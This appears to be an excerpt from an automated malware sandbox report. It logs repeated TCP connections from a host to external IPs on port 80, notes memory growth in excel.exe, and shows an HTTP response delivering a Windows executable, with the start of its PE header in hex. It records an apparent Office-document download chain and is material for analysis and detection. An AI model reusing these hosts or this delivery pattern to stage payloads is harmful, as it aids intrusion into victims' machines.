              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
              Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
              Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
              Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: excel.exeMemory has grown: Private usage: 4MB later: 37MB
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 11:40:27 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Tue, 16 Jul 2024 19:13:36 GMTETag: "e8400-61d6224798859"Accept-Ranges: bytesContent-Length: 951296Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 60 c6 96 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 78 0e 00 00 0a 00 00 00 00 00 00 1e 96 0e 00 00 20 00 00 00 a0 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c9 95 0e 00 4f 00 00 00 00 a0 0e 00 18 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0e 00 0c 00 00 00 28 6d 0e 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 76 0e 00 00 20 00 00 00 78 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 06 00 00 00 a0 0e 00 00 08 00 00 00 7a 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0e 00 00 02 00 00 00 82 0e 00 00 00 00 00 00 00 00 